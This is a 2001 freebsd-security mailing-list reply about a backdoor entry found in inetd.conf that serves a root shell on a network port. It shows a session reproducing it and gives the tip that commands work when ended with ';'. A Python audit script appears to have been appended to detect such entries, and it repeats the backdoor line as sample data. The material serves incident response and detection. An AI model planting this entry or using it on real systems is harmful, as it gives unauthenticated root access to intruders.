From: Krzysztof Zaraska (kzaraska@student.uci.agh.edu.pl)
Date: Thu Nov 01 2001 - 09:05:16 CST


    On Thu, 1 Nov 2001, Ralph Huntington wrote:

    > I have that sinking feeling. I discovered this line at the end of
    > inetd.conf on one of our servers:
    >
    > dlip stream tcp nowait root /bin/sh sh -i
    >
    > Looks like a root compromise. Sure enough, telnet'ing to the dlip port
    > provides what *looks* like a root shell, but I don't seem to be able to do
    > anything with it. Pretty mysterious.
    >
    > Can anyone offer a clue? Thanks in advance, Ralph
    I've reproduced this on my machine. Yes, this is a functional rootshell,
    albeit in a slightly strange manner...

    After telnetting to port 7201:
    # touch /tmp/xxx ;
    : not found
    # ls -l /tmp ;
    total 5
    -rw-rw-rw- 1 kzaraska wheel 3 Nov 1 15:54 .27405.145a7d
    -rw-rw-rw- 1 kzaraska wheel 3 Nov 1 15:54 .27405.366cf
    drwxr-xr-x 2 root wheel 512 Oct 7 22:08 install.554
    drwxr-xr-x 2 root wheel 512 Oct 14 08:39 install.92650
    srwxrwxrwx 1 mysql wheel 0 Nov 1 15:49 mysql.sock
    drwx------ 2 kzaraska wheel 512 Sep 5 15:40 ntVQm8
    -rw-r--r-- 1 root wheel 0 Aug 12 11:41 test
    -rw-r--r-- 1 root wheel 0 Nov 1 15:59 xxx
    : not found
    # id ;
    uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
    5(operator),
    20(staff), 31(guest)
    #

    etc. ls itself does not seem to work, but ls -l ; does, and so on... Guess
    you'll have to experiment a little. Anyhow, this definitely is a backdoor.

    Krzysztof

    To Unsubscribe: send mail to majordomo@FreeBSD.org
    with "unsubscribe freebsd-security" in the body of the message
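The inetd.conf entry discussed in this thread, turned into a defender's audit check: the script below parses an inetd.conf and flags entries whose server program is a shell or whose service name is unknown. It is an added example, not code from the thread; the sample config and the service-name list are constructed.

```python
# Added example (not from the original post): audit an inetd.conf for
# entries that hand a connecting client a shell, such as the line found
# in the thread:  dlip stream tcp nowait root /bin/sh sh -i
import os

SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh", "ash"}

# Constructed sample in the FreeBSD inetd.conf layout:
# service socket-type protocol wait/nowait[/max] user[:group] program args
SAMPLE_INETD_CONF = """\
# (constructed sample)
ftp     stream  tcp     nowait  root    /usr/libexec/ftpd       ftpd -l
telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
#shell  stream  tcp     nowait  root    /usr/libexec/rshd       rshd
dlip    stream  tcp     nowait  root    /bin/sh                 sh -i
"""

# Constructed stand-in for the service names defined in /etc/services.
KNOWN_SERVICES = {"ftp", "telnet", "shell", "login", "exec", "finger"}


def parse_inetd(text):
    """Yield one dict per active (non-comment) inetd.conf entry."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split(None, 6)  # 7th field keeps the whole argument string
        if len(fields) < 6:
            continue  # malformed entry; inetd would reject it as well
        service, stype, proto, wait, user, program = fields[:6]
        args = fields[6] if len(fields) == 7 else ""
        yield {"service": service, "type": stype, "proto": proto, "wait": wait,
               "user": user.split(":")[0], "program": program, "args": args}


def suspicious_entries(text, known_services=KNOWN_SERVICES):
    """Return [(service, [reasons])] for entries a reviewer should look at."""
    findings = []
    for e in parse_inetd(text):
        reasons = []
        if os.path.basename(e["program"]) in SHELLS:
            reasons.append("server program is a shell: %s %s" % (e["program"], e["args"]))
        if e["service"] not in known_services:
            reasons.append("service name %r is not in /etc/services" % e["service"])
        if reasons and e["user"] == "root":
            reasons.append("runs as root")
        if reasons:
            findings.append((e["service"], reasons))
    return findings


if __name__ == "__main__":
    for service, reasons in suspicious_entries(SAMPLE_INETD_CONF):
        print(service, "->", "; ".join(reasons))
```

On a live system, read /etc/inetd.conf and build the known-service set from /etc/services instead of the constructed values.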